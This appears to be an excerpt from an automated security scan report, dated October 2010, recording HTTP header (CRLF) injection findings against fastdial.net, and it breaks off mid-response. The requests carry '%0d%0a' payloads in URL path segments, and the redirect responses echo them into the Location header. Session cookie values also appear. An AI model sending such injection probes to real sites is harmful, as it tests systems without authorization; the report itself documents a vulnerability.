GET /static/9a7db%0d%0a55eafa73e31/common/styles/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:44:20 GMT Server: Apache Location: http://fastdial.net/static/9a7db 55eafa73e31/common/styles/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload ba088%0d%0ae111dbc034d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/ba088%0d%0ae111dbc034d/styles/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:44:34 GMT Server: Apache Location: http://fastdial.net/static/images/ba088 e111dbc034d/styles/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload cd075%0d%0ab37d1df6a98 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/cd075%0d%0ab37d1df6a98/images/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:44:47 GMT Server: Apache Location: http://fastdial.net/static/images/common/cd075 b37d1df6a98/images/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 1eea1%0d%0ae0c6851d538 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/1eea1%0d%0ae0c6851d538/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:45:07 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/1eea1 e0c6851d538/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 9fc01%0d%0ad18443ed28c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9fc01%0d%0ad18443ed28c/images/common/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:51:18 GMT Server: Apache Location: http://fastdial.net/9fc01 d18443ed28c/images/common/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload 3087b%0d%0a71f42db1adf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/3087b%0d%0a71f42db1adf/common/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:51:33 GMT Server: Apache Location: http://fastdial.net/static/3087b 71f42db1adf/common/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload b7b27%0d%0a0c943f61f93 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/b7b27%0d%0a0c943f61f93/styles/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:51:48 GMT Server: Apache Location: http://fastdial.net/static/images/b7b27 0c943f61f93/styles/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 9e2ba%0d%0a7d42c1105e9 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/9e2ba%0d%0a7d42c1105e9/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 19:52:03 GMT Server: Apache Location: http://fastdial.net/static/images/common/9e2ba 7d42c1105e9/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload e0d6a%0d%0a8aefcd569a2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e0d6a%0d%0a8aefcd569a2/images/common/styles/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:43:16 GMT Server: Apache Location: http://fastdial.net/e0d6a 8aefcd569a2/images/common/styles/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload d9196%0d%0a1be9a77c8ce was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/d9196%0d%0a1be9a77c8ce/common/styles/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:43:37 GMT Server: Apache Location: http://fastdial.net/static/d9196 1be9a77c8ce/common/styles/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 12e44%0d%0aff4bb079dda was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/12e44%0d%0aff4bb079dda/styles/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:43:53 GMT Server: Apache Location: http://fastdial.net/static/images/12e44 ff4bb079dda/styles/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload 4fee1%0d%0a984badc428a was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/4fee1%0d%0a984badc428a/scripts/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:44:04 GMT Server: Apache Location: http://fastdial.net/static/images/common/4fee1 984badc428a/scripts/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 946e5%0d%0a089e9335f18 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/946e5%0d%0a089e9335f18/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:44:22 GMT Server: Apache Location: http://fastdial.net/static/images/common/styles/946e5 089e9335f18/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 2dc0e%0d%0ae87daa70fb5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2dc0e%0d%0ae87daa70fb5/images/common/styles/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:42:30 GMT Server: Apache Location: http://fastdial.net/2dc0e e87daa70fb5/images/common/styles/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 2 is copied into the Location response header. The payload d848d%0d%0a40b50cdfaeb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /static/d848d%0d%0a40b50cdfaeb/common/styles/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:42:45 GMT Server: Apache Location: http://fastdial.net/static/d848d 40b50cdfaeb/common/styles/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Location response header. The payload 9e943%0d%0a7b0eb99e4e2 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /static/images/9e943%0d%0a7b0eb99e4e2/styles/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:42:59 GMT Server: Apache Location: http://fastdial.net/static/images/9e943 7b0eb99e4e2/styles/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 4 is copied into the Location response header. The payload d0297%0d%0aafbdde6d215 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/d0297%0d%0aafbdde6d215/styles/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:43:13 GMT Server: Apache Location: http://fastdial.net/static/images/common/d0297 afbdde6d215/styles/common/rsscategory.sc Content-Length: 0 Connection: close Content-Type: text/plain
The value of REST URL parameter 5 is copied into the Location response header. The payload 4235a%0d%0a63219ae5f70 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /static/images/common/styles/4235a%0d%0a63219ae5f70/common/rsscategory.sc HTTP/1.1 Host: fastdial.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=97C2D450EF49DD5399707ECCDF1FA020.qscstrfrnt04; whoson=963-1287271164005; cookieCheck=enabled; shoppingCartId=expired;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 16 Oct 2010 23:43:27